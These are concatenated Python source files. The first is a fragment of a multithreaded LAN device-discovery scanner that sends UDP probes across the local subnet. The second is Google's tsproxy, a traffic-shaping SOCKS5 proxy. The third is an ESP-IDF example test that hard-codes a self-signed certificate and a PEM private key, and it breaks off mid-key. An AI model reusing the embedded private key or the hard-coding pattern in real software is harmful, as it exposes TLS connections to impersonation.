self.timeout = 5
self.check_port = port
self.base = ".".join(self.GW.split(".")[:3]) + "."
self.running = 0
self.Devices = Devices()
def Collect(self, timeout=5, runners=None, hotphrase=None):
if runners is not None:
self.runners = runners
if hotphrase is not None:
self.hotphrase = hotphrase
self.Devices = Devices()
self.counted = 0
self.timeout = timeout
self.responses = 0
runners = self.runners
start = 1
end = 0
for i in range(1, runners + 1):
end = 255//runners*i
if i == runners:
end = 255
threading.Thread(target=self.__runner__, args=[start, end, self.check_port], daemon=True).start()
self.running += 1
start += (255//runners)
while self.running > 0:
print("[ DDS ] - Device Discovery Scan. Addresses Contacted:", self.counted, end="\r")
time.sleep(0.01)
print("[ DDS ] - Device Discovery Scan. Addresses Contacted:", self.counted)
to = 0
while to < timeout:
print("[ DDS ] - Device Discovery Scan. Responses:", self.responses, end="\r")
to += 0.01
time.sleep(0.01)
print("[ DDS ] - Device Discovery Scan. Responses:", self.responses)
return self.Devices
def __runner_data__(self, data, address):
self.responses += 1
self.Devices.All[address[0]] = Device(address[0], data.decode())
def __runner__(self, start, end, port):
while start <= end:
try:
if start == 255:
break
rmIP = self.base + str(start)
self.counted += 1
try:
connector = socket_ops.UDP_Connector(rmIP, self.check_port, self.__runner_data__, 5)
connector.send(self.hotphrase.encode())
except Exception as e:
print(e)
pass
except KeyboardInterrupt:
print("[ UKI ] - User Keyboard Interupt")
exit()
except TimeoutError:
pass
except Exception as e:
#print(e)
pass
start += 1
self.running -= 1
|
tsproxy.py
|
#!/usr/bin/env python
"""
Copyright 2016 Google Inc. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import asyncore
import gc
import logging
import platform
try:
from Queue import Queue
from Queue import Empty
except ImportError:
from queue import Queue
from queue import Empty
import re
import signal
import socket
import sys
import threading
import time
server = None
in_pipe = None
out_pipe = None
must_exit = False
options = None
dest_addresses = None
connections = {}
dns_cache = {}
port_mappings = None
map_localhost = False
needs_flush = False
flush_pipes = False
last_activity = None
last_client_disconnected = None
REMOVE_TCP_OVERHEAD = 1460.0 / 1500.0
lock = threading.Lock()
background_activity_count = 0
if (sys.version_info >= (3,0)):
from time import monotonic
else:
from monotonic import monotonic
current_time = monotonic
def PrintMessage(msg):
# Print the message to stdout & flush to make sure that the message is not
# buffered when tsproxy is run as a subprocess.
sys.stdout.write(msg + '\n')
sys.stdout.flush()
########################################################################################################################
# Traffic-shaping pipe (just passthrough for now)
########################################################################################################################
class TSPipe():
PIPE_IN = 0
PIPE_OUT = 1
def __init__(self, direction, latency, kbps):
self.direction = direction
self.latency = latency
self.kbps = kbps
self.queue = Queue()
self.last_tick = current_time()
self.next_message = None
self.available_bytes = .0
self.peer = 'server'
if self.direction == self.PIPE_IN:
self.peer = 'client'
def SendMessage(self, message, main_thread = True):
global connections, in_pipe, out_pipe
message_sent = False
now = current_time()
if message['message'] == 'closed':
message['time'] = now
else:
message['time'] = current_time() + self.latency
message['size'] = .0
if 'data' in message:
message['size'] = float(len(message['data']))
try:
connection_id = message['connection']
# Send messages directly, bypassing the queues is throttling is disabled and we are on the main thread
if main_thread and connection_id in connections and self.peer in connections[connection_id]and self.latency == 0 and self.kbps == .0:
message_sent = self.SendPeerMessage(message)
except:
pass
if not message_sent:
try:
self.queue.put(message)
except:
pass
def SendPeerMessage(self, message):
global last_activity, last_client_disconnected
last_activity = current_time()
message_sent = False
connection_id = message['connection']
if connection_id in connections:
if self.peer in connections[connection_id]:
try:
connections[connection_id][self.peer].handle_message(message)
message_sent = True
except:
# Clean up any disconnected connections
try:
connections[connection_id]['server'].close()
except:
pass
try:
connections[connection_id]['client'].close()
except:
pass
del connections[connection_id]
if not connections:
last_client_disconnected = current_time()
logging.info('[{0:d}] Last connection closed'.format(self.client_id))
return message_sent
def tick(self):
global connections
global flush_pipes
next_packet_time = None
processed_messages = False
now = current_time()
try:
if self.next_message is None:
self.next_message = self.queue.get_nowait()
# Accumulate bandwidth if an available packet/message was waiting since our last tick
if self.next_message is not None and self.kbps > .0 and self.next_message['time'] <= now:
elapsed = now - self.last_tick
accumulated_bytes = elapsed * self.kbps * 1000.0 / 8.0
self.available_bytes += accumulated_bytes
# process messages as long as the next message is sendable (latency or available bytes)
while (self.next_message is not None) and\
(flush_pipes or ((self.next_message['time'] <= now) and
(self.kbps <= .0 or self.next_message['size'] <= self.available_bytes))):
processed_messages = True
message = self.next_message
self.next_message = None
if self.kbps > .0:
self.available_bytes -= message['size']
try:
self.SendPeerMessage(message)
except:
pass
self.next_message = self.queue.get_nowait()
except Empty:
pass
except Exception as e:
logging.exception('Tick Exception')
# Only accumulate bytes while we have messages that are ready to send
if self.next_message is None or self.next_message['time'] > now:
self.available_bytes = .0
self.last_tick = now
# Figure out how long until the next packet can be sent
if self.next_message is not None:
# First, just the latency
next_packet_time = self.next_message['time'] - now
# Additional time for bandwidth
if self.kbps > .0:
accumulated_bytes = self.available_bytes + next_packet_time * self.kbps * 1000.0 / 8.0
needed_bytes = self.next_message['size'] - accumulated_bytes
if needed_bytes > 0:
needed_time = needed_bytes / (self.kbps * 1000.0 / 8.0)
next_packet_time += needed_time
return next_packet_time
########################################################################################################################
# Threaded DNS resolver
########################################################################################################################
class AsyncDNS(threading.Thread):
def __init__(self, client_id, hostname, port, is_localhost, result_pipe):
threading.Thread.__init__(self)
self.hostname = hostname
self.port = port
self.client_id = client_id
self.is_localhost = is_localhost
self.result_pipe = result_pipe
def run(self):
global lock, background_activity_count
try:
logging.debug('[{0:d}] AsyncDNS - calling getaddrinfo for {1}:{2:d}'.format(self.client_id, self.hostname, self.port))
addresses = socket.getaddrinfo(self.hostname, self.port)
logging.info('[{0:d}] Resolving {1}:{2:d} Completed'.format(self.client_id, self.hostname, self.port))
except:
addresses = ()
logging.info('[{0:d}] Resolving {1}:{2:d} Failed'.format(self.client_id, self.hostname, self.port))
message = {'message': 'resolved', 'connection': self.client_id, 'addresses': addresses, 'localhost': self.is_localhost}
self.result_pipe.SendMessage(message, False)
lock.acquire()
if background_activity_count > 0:
background_activity_count -= 1
lock.release()
# open and close a local socket which will interrupt the long polling loop to process the message
s = socket.socket()
s.connect((server.ipaddr, server.port))
s.close()
########################################################################################################################
# TCP Client
########################################################################################################################
class TCPConnection(asyncore.dispatcher):
STATE_ERROR = -1
STATE_IDLE = 0
STATE_RESOLVING = 1
STATE_CONNECTING = 2
STATE_CONNECTED = 3
def __init__(self, client_id):
global options
asyncore.dispatcher.__init__(self)
self.client_id = client_id
self.state = self.STATE_IDLE
self.buffer = ''
self.addr = None
self.dns_thread = None
self.hostname = None
self.port = None
self.needs_config = True
self.needs_close = False
self.did_resolve = False
def SendMessage(self, type, message):
message['message'] = type
message['connection'] = self.client_id
in_pipe.SendMessage(message)
def handle_message(self, message):
if message['message'] == 'data' and 'data' in message and len(message['data']):
self.buffer += message['data']
if self.state == self.STATE_CONNECTED:
self.handle_write()
elif message['message'] == 'resolve':
self.HandleResolve(message)
elif message['message'] == 'connect':
self.HandleConnect(message)
elif message['message'] == 'closed':
if len(self.buffer) == 0:
self.handle_close()
else:
self.needs_close = True
def handle_error(self):
logging.warning('[{0:d}] Error'.format(self.client_id))
if self.state == self.STATE_CONNECTING:
self.SendMessage('connected', {'success': False, 'address': self.addr})
def handle_close(self):
global last_client_disconnected
logging.info('[{0:d}] Server Connection Closed'.format(self.client_id))
self.state = self.STATE_ERROR
self.close()
try:
if self.client_id in connections:
if 'server' in connections[self.client_id]:
del connections[self.client_id]['server']
if 'client' in connections[self.client_id]:
self.SendMessage('closed', {})
else:
del connections[self.client_id]
if not connections:
last_client_disconnected = current_time()
logging.info('[{0:d}] Last Browser disconnected'.format(self.client_id))
except:
pass
def handle_connect(self):
if self.state == self.STATE_CONNECTING:
self.state = self.STATE_CONNECTED
self.SendMessage('connected', {'success': True, 'address': self.addr})
logging.info('[{0:d}] Connected'.format(self.client_id))
self.handle_write()
def writable(self):
if self.state == self.STATE_CONNECTING:
return True
return len(self.buffer) > 0
def handle_write(self):
if self.needs_config:
self.needs_config = False
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 128 * 1024)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 128 * 1024)
if len(self.buffer) > 0:
sent = self.send(self.buffer)
logging.debug('[{0:d}] TCP => {1:d} byte(s)'.format(self.client_id, sent))
self.buffer = self.buffer[sent:]
if self.needs_close and len(self.buffer) == 0:
self.needs_close = False
self.handle_close()
def handle_read(self):
try:
while True:
data = self.recv(1460)
if data:
if self.state == self.STATE_CONNECTED:
logging.debug('[{0:d}] TCP <= {1:d} byte(s)'.format(self.client_id, len(data)))
self.SendMessage('data', {'data': data})
else:
return
except:
pass
def HandleResolve(self, message):
global in_pipe, map_localhost, lock, background_activity_count
self.did_resolve = True
is_localhost = False
if 'hostname' in message:
self.hostname = message['hostname']
self.port = 0
if 'port' in message:
self.port = message['port']
logging.info('[{0:d}] Resolving {1}:{2:d}'.format(self.client_id, self.hostname, self.port))
if self.hostname == 'localhost':
self.hostname = '127.0.0.1'
if self.hostname == '127.0.0.1':
logging.info('[{0:d}] Connection to localhost detected'.format(self.client_id))
is_localhost = True
if (dest_addresses is not None) and (not is_localhost or map_localhost):
logging.info('[{0:d}] Resolving {1}:{2:d} to mapped address {3}'.format(self.client_id, self.hostname, self.port, dest_addresses))
self.SendMessage('resolved', {'addresses': dest_addresses, 'localhost': False})
else:
lock.acquire()
background_activity_count += 1
lock.release()
self.state = self.STATE_RESOLVING
self.dns_thread = AsyncDNS(self.client_id, self.hostname, self.port, is_localhost, in_pipe)
self.dns_thread.start()
def HandleConnect(self, message):
global map_localhost
if 'addresses' in message and len(message['addresses']):
self.state = self.STATE_CONNECTING
is_localhost = False
if 'localhost' in message:
is_localhost = message['localhost']
elif not self.did_resolve and message['addresses'][0] == '127.0.0.1':
logging.info('[{0:d}] Connection to localhost detected'.format(self.client_id))
is_localhost = True
if (dest_addresses is not None) and (not is_localhost or map_localhost):
self.addr = dest_addresses[0]
else:
self.addr = message['addresses'][0]
self.create_socket(self.addr[0], socket.SOCK_STREAM)
addr = self.addr[4][0]
if not is_localhost or map_localhost:
port = GetDestPort(message['port'])
else:
port = message['port']
logging.info('[{0:d}] Connecting to {1}:{2:d}'.format(self.client_id, addr, port))
self.connect((addr, port))
########################################################################################################################
# Socks5 Server
########################################################################################################################
class Socks5Server(asyncore.dispatcher):
def __init__(self, host, port):
asyncore.dispatcher.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.set_reuse_addr()
self.bind((host, port))
self.listen(socket.SOMAXCONN)
self.ipaddr, self.port = self.socket.getsockname()
self.current_client_id = 0
except:
PrintMessage("Unable to listen on {0}:{1}. Is the port already in use?".format(host, port))
exit(1)
def handle_accept(self):
global connections, last_client_disconnected
pair = self.accept()
if pair is not None:
last_client_disconnected = None
sock, addr = pair
self.current_client_id += 1
logging.info('[{0:d}] Incoming connection from {1}'.format(self.current_client_id, repr(addr)))
connections[self.current_client_id] = {
'client' : Socks5Connection(sock, self.current_client_id),
'server' : None
}
# Socks5 reference: https://en.wikipedia.org/wiki/SOCKS#SOCKS5
class Socks5Connection(asyncore.dispatcher):
STATE_ERROR = -1
STATE_WAITING_FOR_HANDSHAKE = 0
STATE_WAITING_FOR_CONNECT_REQUEST = 1
STATE_RESOLVING = 2
STATE_CONNECTING = 3
STATE_CONNECTED = 4
def __init__(self, connected_socket, client_id):
global options
asyncore.dispatcher.__init__(self, connected_socket)
self.client_id = client_id
self.state = self.STATE_WAITING_FOR_HANDSHAKE
self.ip = None
self.addresses = None
self.hostname = None
self.port = None
self.requested_address = None
self.buffer = ''
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 128 * 1024)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 128 * 1024)
self.needs_close = False
def SendMessage(self, type, message):
message['message'] = type
message['connection'] = self.client_id
out_pipe.SendMessage(message)
def handle_message(self, message):
if message['message'] == 'data' and 'data' in message and len(message['data']) > 0:
self.buffer += message['data']
if self.state == self.STATE_CONNECTED:
self.handle_write()
elif message['message'] == 'resolved':
self.HandleResolved(message)
elif message['message'] == 'connected':
self.HandleConnected(message)
self.handle_write()
elif message['message'] == 'closed':
if len(self.buffer) == 0:
logging.info('[{0:d}] Server connection close being processed, closing Browser connection'.format(self.client_id))
self.handle_close()
else:
logging.info('[{0:d}] Server connection close being processed, queuing browser connection close'.format(self.client_id))
self.needs_close = True
def writable(self):
return len(self.buffer) > 0
def handle_write(self):
if len(self.buffer) > 0:
sent = self.send(self.buffer)
logging.debug('[{0:d}] SOCKS <= {1:d} byte(s)'.format(self.client_id, sent))
self.buffer = self.buffer[sent:]
if self.needs_close and len(self.buffer) == 0:
logging.info('[{0:d}] queued browser connection close being processed, closing Browser connection'.format(self.client_id))
self.needs_close = False
self.handle_close()
def handle_read(self):
global connections
global dns_cache
try:
while True:
# Consume in up-to packet-sized chunks (TCP packet payload as 1460 bytes from 1500 byte ethernet frames)
data = self.recv(1460)
if data:
data_len = len(data)
if self.state == self.STATE_CONNECTED:
logging.debug('[{0:d}] SOCKS => {1:d} byte(s)'.format(self.client_id, data_len))
self.SendMessage('data', {'data': data})
elif self.state == self.STATE_WAITING_FOR_HANDSHAKE:
self.state = self.STATE_ERROR #default to an error state, set correctly if things work out
if data_len >= 2 and ord(data[0]) == 0x05:
supports_no_auth = False
auth_count = ord(data[1])
if data_len == auth_count + 2:
for i in range(auth_count):
offset = i + 2
if ord(data[offset]) == 0:
supports_no_auth = True
if supports_no_auth:
# Respond with a message that "No Authentication" was agreed to
logging.info('[{0:d}] New Socks5 client'.format(self.client_id))
response = chr(0x05) + chr(0x00)
self.state = self.STATE_WAITING_FOR_CONNECT_REQUEST
self.buffer += response
self.handle_write()
elif self.state == self.STATE_WAITING_FOR_CONNECT_REQUEST:
self.state = self.STATE_ERROR #default to an error state, set correctly if things work out
if data_len >= 10 and ord(data[0]) == 0x05 and ord(data[2]) == 0x00:
if ord(data[1]) == 0x01: #TCP connection (only supported method for now)
connections[self.client_id]['server'] = TCPConnection(self.client_id)
self.requested_address = data[3:]
port_offset = 0
if ord(data[3]) == 0x01:
port_offset = 8
self.ip = '{0:d}.{1:d}.{2:d}.{3:d}'.format(ord(data[4]), ord(data[5]), ord(data[6]), ord(data[7]))
elif ord(data[3]) == 0x03:
name_len = ord(data[4])
if data_len >= 6 + name_len:
port_offset = 5 + name_len
self.hostname = data[5:5 + name_len]
elif ord(data[3]) == 0x04 and data_len >= 22:
port_offset = 20
self.ip = ''
for i in range(16):
self.ip += '{0:02x}'.format(ord(data[4 + i]))
if i % 2 and i < 15:
self.ip += ':'
if port_offset and connections[self.client_id]['server'] is not None:
self.port = 256 * ord(data[port_offset]) + ord(data[port_offset + 1])
if self.port:
if self.ip is None and self.hostname is not None:
if dns_cache is not None and self.hostname in dns_cache:
self.state = self.STATE_CONNECTING
cache_entry = dns_cache[self.hostname]
self.addresses = cache_entry['addresses']
self.SendMessage('connect', {'addresses': self.addresses, 'port': self.port, 'localhost': cache_entry['localhost']})
else:
self.state = self.STATE_RESOLVING
self.SendMessage('resolve', {'hostname': self.hostname, 'port': self.port})
elif self.ip is not None:
self.state = self.STATE_CONNECTING
logging.debug('[{0:d}] Socks Connect - calling getaddrinfo for {1}:{2:d}'.format(self.client_id, self.ip, self.port))
self.addresses = socket.getaddrinfo(self.ip, self.port)
self.SendMessage('connect', {'addresses': self.addresses, 'port': self.port})
else:
return
except:
pass
def handle_close(self):
global last_client_disconnected
logging.info('[{0:d}] Browser Connection Closed by browser'.format(self.client_id))
self.state = self.STATE_ERROR
self.close()
try:
if self.client_id in connections:
if 'client' in connections[self.client_id]:
del connections[self.client_id]['client']
if 'server' in connections[self.client_id]:
self.SendMessage('closed', {})
else:
del connections[self.client_id]
if not connections:
last_client_disconnected = current_time()
logging.info('[{0:d}] Last Browser disconnected'.format(self.client_id))
except:
pass
def HandleResolved(self, message):
global dns_cache
if self.state == self.STATE_RESOLVING:
if 'addresses' in message and len(message['addresses']):
self.state = self.STATE_CONNECTING
self.addresses = message['addresses']
if dns_cache is not None:
dns_cache[self.hostname] = {'addresses': self.addresses, 'localhost': message['localhost']}
logging.debug('[{0:d}] Resolved {1}, Connecting'.format(self.client_id, self.hostname))
self.SendMessage('connect', {'addresses': self.addresses, 'port': self.port, 'localhost': message['localhost']})
else:
# Send host unreachable error
self.state = self.STATE_ERROR
self.buffer += chr(0x05) + chr(0x04) + self.requested_address
self.handle_write()
def HandleConnected(self, message):
if 'success' in message and self.state == self.STATE_CONNECTING:
response = chr(0x05)
if message['success']:
response += chr(0x00)
logging.debug('[{0:d}] Connected to {1}'.format(self.client_id, self.hostname))
self.state = self.STATE_CONNECTED
else:
response += chr(0x04)
self.state = self.STATE_ERROR
response += chr(0x00)
response += self.requested_address
self.buffer += response
self.handle_write()
########################################################################################################################
# stdin command processor
########################################################################################################################
class CommandProcessor():
def __init__(self):
thread = threading.Thread(target = self.run, args=())
thread.daemon = True
thread.start()
def run(self):
global must_exit
while not must_exit:
for line in iter(sys.stdin.readline, ''):
self.ProcessCommand(line.strip())
def ProcessCommand(self, input):
global in_pipe
global out_pipe
global needs_flush
global REMOVE_TCP_OVERHEAD
global port_mappings
global server
global must_exit
if len(input):
ok = False
try:
command = input.split()
if len(command) and len(command[0]):
if command[0].lower() == 'flush':
ok = True
elif command[0].lower() == 'set' and len(command) >= 3:
if command[1].lower() == 'rtt' and len(command[2]):
rtt = float(command[2])
latency = rtt / 2000.0
in_pipe.latency = latency
out_pipe.latency = latency
ok = True
elif command[1].lower() == 'inkbps' and len(command[2]):
in_pipe.kbps = float(command[2]) * REMOVE_TCP_OVERHEAD
ok = True
elif command[1].lower() == 'outkbps' and len(command[2]):
out_pipe.kbps = float(command[2]) * REMOVE_TCP_OVERHEAD
ok = True
elif command[1].lower() == 'mapports' and len(command[2]):
SetPortMappings(command[2])
ok = True
elif command[0].lower() == 'reset' and len(command) >= 2:
if command[1].lower() == 'rtt' or command[1].lower() == 'all':
in_pipe.latency = 0
out_pipe.latency = 0
ok = True
if command[1].lower() == 'inkbps' or command[1].lower() == 'all':
in_pipe.kbps = 0
ok = True
if command[1].lower() == 'outkbps' or command[1].lower() == 'all':
out_pipe.kbps = 0
ok = True
if command[1].lower() == 'mapports' or command[1].lower() == 'all':
port_mappings = {}
ok = True
elif command[0].lower() == 'exit':
must_exit = True
ok = True
if ok:
needs_flush = True
except:
pass
if not ok:
PrintMessage('ERROR')
# open and close a local socket which will interrupt the long polling loop to process the flush
if needs_flush:
s = socket.socket()
s.connect((server.ipaddr, server.port))
s.close()
########################################################################################################################
# Main Entry Point
########################################################################################################################
def main():
global server
global options
global in_pipe
global out_pipe
global dest_addresses
global port_mappings
global map_localhost
global dns_cache
import argparse
global REMOVE_TCP_OVERHEAD
parser = argparse.ArgumentParser(description='Traffic-shaping socks5 proxy.',
prog='tsproxy')
parser.add_argument('-v', '--verbose', action='count', help="Increase verbosity (specify multiple times for more). -vvvv for full debug output.")
parser.add_argument('--logfile', help="Write log messages to given file instead of stdout.")
parser.add_argument('-b', '--bind', default='localhost', help="Server interface address (defaults to localhost).")
parser.add_argument('-p', '--port', type=int, default=1080, help="Server port (defaults to 1080, use 0 for randomly assigned).")
parser.add_argument('-r', '--rtt', type=float, default=.0, help="Round Trip Time Latency (in ms).")
parser.add_argument('-i', '--inkbps', type=float, default=.0, help="Download Bandwidth (in 1000 bits/s - Kbps).")
parser.add_argument('-o', '--outkbps', type=float, default=.0, help="Upload Bandwidth (in 1000 bits/s - Kbps).")
parser.add_argument('-w', '--window', type=int, default=10, help="Emulated TCP initial congestion window (defaults to 10).")
parser.add_argument('-d', '--desthost', help="Redirect all outbound connections to the specified host.")
parser.add_argument('-m', '--mapports', help="Remap outbound ports. Comma-separated list of original:new with * as a wildcard. --mapports '443:8443,*:8080'")
parser.add_argument('-l', '--localhost', action='store_true', default=False,
help="Include connections already destined for localhost/127.0.0.1 in the host and port remapping.")
parser.add_argument('-n', '--nodnscache', action='store_true', default=False, help="Disable internal DNS cache.")
parser.add_argument('-f', '--flushdnscache', action='store_true', default=False, help="Automatically flush the DNS cache 500ms after the last client disconnects.")
options = parser.parse_args()
# Set up logging
log_level = logging.CRITICAL
if not options.verbose:
pass
elif options.verbose == 1:
log_level = logging.ERROR
elif options.verbose == 2:
log_level = logging.WARNING
elif options.verbose == 3:
log_level = logging.INFO
elif options.verbose >= 4:
log_level = logging.DEBUG
if options.logfile is not None:
logging.basicConfig(filename=options.logfile, level=log_level,
format="%(asctime)s.%(msecs)03d - %(message)s", datefmt="%H:%M:%S")
else:
logging.basicConfig(level=log_level, format="%(asctime)s.%(msecs)03d - %(message)s", datefmt="%H:%M:%S")
# Parse any port mappings
if options.mapports:
SetPortMappings(options.mapports)
if options.nodnscache:
dns_cache = None
map_localhost = options.localhost
# Resolve the address for a rewrite destination host if one was specified
if options.desthost:
logging.debug('Startup - calling getaddrinfo for {0}:{1:d}'.format(options.desthost, GetDestPort(80)))
dest_addresses = socket.getaddrinfo(options.desthost, GetDestPort(80))
# Set up the pipes. 1/2 of the latency gets applied in each direction (and /1000 to convert to seconds)
in_pipe = TSPipe(TSPipe.PIPE_IN, options.rtt / 2000.0, options.inkbps * REMOVE_TCP_OVERHEAD)
out_pipe = TSPipe(TSPipe.PIPE_OUT, options.rtt / 2000.0, options.outkbps * REMOVE_TCP_OVERHEAD)
signal.signal(signal.SIGINT, signal_handler)
server = Socks5Server(options.bind, options.port)
command_processor = CommandProcessor()
PrintMessage('Started Socks5 proxy server on {0}:{1:d}\nHit Ctrl-C to exit.'.format(server.ipaddr, server.port))
run_loop()
def signal_handler(signal, frame):
global server
global must_exit
logging.error('Exiting...')
must_exit = True
del server
# Wrapper around the asyncore loop that lets us poll the in/out pipes every 1ms
def run_loop():
global must_exit
global in_pipe
global out_pipe
global needs_flush
global flush_pipes
global last_activity
global last_client_disconnected
global dns_cache
winmm = None
# increase the windows timer resolution to 1ms
if platform.system() == "Windows":
try:
import ctypes
winmm = ctypes.WinDLL('winmm')
winmm.timeBeginPeriod(1)
except:
pass
last_activity = current_time()
last_check = current_time()
# disable gc to avoid pauses during traffic shaping/proxying
gc.disable()
out_interval = None
in_interval = None
while not must_exit:
# Tick every 1ms if traffic-shaping is enabled and we have data or are doing background dns lookups, every 1 second otherwise
lock.acquire()
tick_interval = 0.001
if out_interval is not None:
tick_interval = max(tick_interval, out_interval)
if in_interval is not None:
tick_interval = max(tick_interval, in_interval)
if background_activity_count == 0:
if in_pipe.next_message is None and in_pipe.queue.empty() and out_pipe.next_message is None and out_pipe.queue.empty():
tick_interval = 1.0
elif in_pipe.kbps == .0 and in_pipe.latency == 0 and out_pipe.kbps == .0 and out_pipe.latency == 0:
tick_interval = 1.0
lock.release()
logging.debug("Tick Time: %0.3f", tick_interval)
asyncore.poll(tick_interval, asyncore.socket_map)
if needs_flush:
flush_pipes = True
dns_cache = {}
needs_flush = False
out_interval = out_pipe.tick()
in_interval = in_pipe.tick()
if flush_pipes:
PrintMessage('OK')
flush_pipes = False
now = current_time()
# Clear the DNS cache 500ms after the last client disconnects
if options.flushdnscache and last_client_disconnected is not None and dns_cache:
if now - last_client_disconnected >= 0.5:
dns_cache = {}
last_client_disconnected = None
logging.debug("Flushed DNS cache")
# Every 500 ms check to see if it is a good time to do a gc
if now - last_check >= 0.5:
last_check = now
# manually gc after 5 seconds of idle
if now - last_activity >= 5:
last_activity = now
logging.debug("Triggering manual GC")
gc.collect()
if winmm is not None:
winmm.timeEndPeriod(1)
def GetDestPort(port):
global port_mappings
if port_mappings is not None:
src_port = str(port)
if src_port in port_mappings:
return port_mappings[src_port]
elif 'default' in port_mappings:
return port_mappings['default']
return port
def SetPortMappings(map_string):
global port_mappings
port_mappings = {}
map_string = map_string.strip('\'" \t\r\n')
for pair in map_string.split(','):
(src, dest) = pair.split(':')
if src == '*':
port_mappings['default'] = int(dest)
logging.debug("Default port mapped to port {0}".format(dest))
else:
logging.debug("Port {0} mapped to port {1}".format(src, dest))
port_mappings[src] = int(dest)
if '__main__' == __name__:
main()
|
example_test.py
|
import re
import os
import socket
import BaseHTTPServer
import SimpleHTTPServer
from threading import Thread
import ssl
from tiny_test_fw import DUT
import ttfw_idf
import random
server_cert = "-----BEGIN CERTIFICATE-----\n" \
"MIIDXTCCAkWgAwIBAgIJAP4LF7E72HakMA0GCSqGSIb3DQEBCwUAMEUxCzAJBgNV\n"\
"BAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBX\n"\
"aWRnaXRzIFB0eSBMdGQwHhcNMTkwNjA3MDk1OTE2WhcNMjAwNjA2MDk1OTE2WjBF\n"\
"MQswCQYDVQQGEwJBVTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50\n"\
"ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB\n"\
"CgKCAQEAlzfCyv3mIv7TlLkObxunKfCdrJ/zgdANrsx0RBtpEPhV560hWJ0fEin0\n"\
"nIOMpJSiF9E6QsPdr6Q+eogH4XnOMU9JE+iG743N1dPfGEzJvRlyct/Ck8SswKPC\n"\
"9+VXsnOdZmUw9y/xtANbURA/TspvPzz3Avv382ffffrJGh7ooOmaZSCZFlSYHLZA\n"\
"w/XlRr0sSRbLpFGY0gXjaAV8iHHiPDYLy4kZOepjV9U51xi+IGsL4w75zuMgsHyF\n"\
"3nJeGYHgtGVBrkL0ZKG5udY0wcBjysjubDJC4iSlNiq2HD3fhs7j6CZddV2v845M\n"\
"lVKNxP0kO4Uj4D8r+5USWC8JKfAwxQIDAQABo1AwTjAdBgNVHQ4EFgQU6OE7ssfY\n"\
"IIPTDThiUoofUpsD5NwwHwYDVR0jBBgwFoAU6OE7ssfYIIPTDThiUoofUpsD5Nww\n"\
"DAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAXIlHS/FJWfmcinUAxyBd\n"\
"/xd5Lu8ykeru6oaUCci+Vk9lyoMMES7lQ+b/00d5x7AcTawkTil9EWpBTPTOTraA\n"\
"lzJMQhNKmSLk0iIoTtAJtSZgUSpIIozqK6lenxQQDsHbXKU6h+u9H6KZE8YcjsFl\n"\
"6vL7sw9BVotw/VxfgjQ5OSGLgoLrdVT0z5C2qOuwOgz1c7jNiJhtMdwN+cOtnJp2\n"\
"fuBgEYyE3eeuWogvkWoDcIA8r17Ixzkpq2oJsdvZcHZPIZShPKW2SHUsl98KDemu\n"\
"y0pQyExmQUbwKE4vbFb9XuWCcL9XaOHQytyszt2DeD67AipvoBwVU7/LBOvqnsmy\n"\
"hA==\n"\
"-----END CERTIFICATE-----\n"
server_key = "-----BEGIN PRIVATE KEY-----\n"\
"MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCXN8LK/eYi/tOU\n"\
"uQ5vG6cp8J2sn/OB0A2uzHREG2kQ+FXnrSFYnR8SKfScg4yklKIX0TpCw92vpD56\n"\
"iAfhec4xT0kT6Ibvjc3V098YTMm9GXJy38KTxKzAo8L35Veyc51mZTD3L/G0A1tR\n"\
"ED9Oym8/PPcC+/fzZ999+skaHuig6ZplIJkWVJgctkDD9eVGvSxJFsukUZjSBeNo\n"\
"BXyIceI8NgvLiRk56mNX1TnXGL4gawvjDvnO4yCwfIXecl4ZgeC0ZUGuQvRkobm5\n"\
"1jTBwGPKyO5sMkLiJKU2KrYcPd+GzuPoJl11Xa/zjkyVUo3E/SQ7hSPgPyv7lRJY\n"\
"Lwkp8DDFAgMBAAECggEAfBhAfQE7mUByNbxgAgI5fot9eaqR1Nf+QpJ6X2H3KPwC\n"\
"02sa0HOwieFwYfj6tB1doBoNq7i89mTc+QUlIn4pHgIowHO0OGawomeKz5BEhjCZ\n"\
"4XeLYGSoODary2+kNkf2xY8JTfFEcyvGBpJEwc4S2VyYgRRx+IgnumTSH+N5mIKZ\n"\
"SXWNdZIuHEmkwod+rPRXs6/r+PH0eVW6WfpINEbr4zVAGXJx2zXQwd2cuV1GTJWh\n"\
"cPVOXLu+XJ9im9B370cYN6GqUnR3fui13urYbnWnEf3syvoH/zuZkyrVChauoFf8\n"\
"8EGb74/HhXK7Q2s8NRakx2c7OxQifCbcy03liUMmyQKBgQDFAob5B/66N4Q2cq/N\n"\
"MWPf98kYBYoLaeEOhEJhLQlKk0pIFCTmtpmUbpoEes2kCUbH7RwczpYko8tlKyoB\n"\
"6Fn6RY4zQQ64KZJI6kQVsjkYpcP/ihnOY6rbds+3yyv+4uPX7Eh9sYZwZMggE19M\n"\
"CkFHkwAjiwqhiiSlUxe20sWmowKBgQDEfx4lxuFzA1PBPeZKGVBTxYPQf+DSLCre\n"\
"ZFg3ZmrxbCjRq1O7Lra4FXWD3dmRq7NDk79JofoW50yD8wD7I0B7opdDfXD2idO8\n"\
"0dBnWUKDr2CAXyoLEINce9kJPbx4kFBQRN9PiGF7VkDQxeQ3kfS8CvcErpTKCOdy\n"\
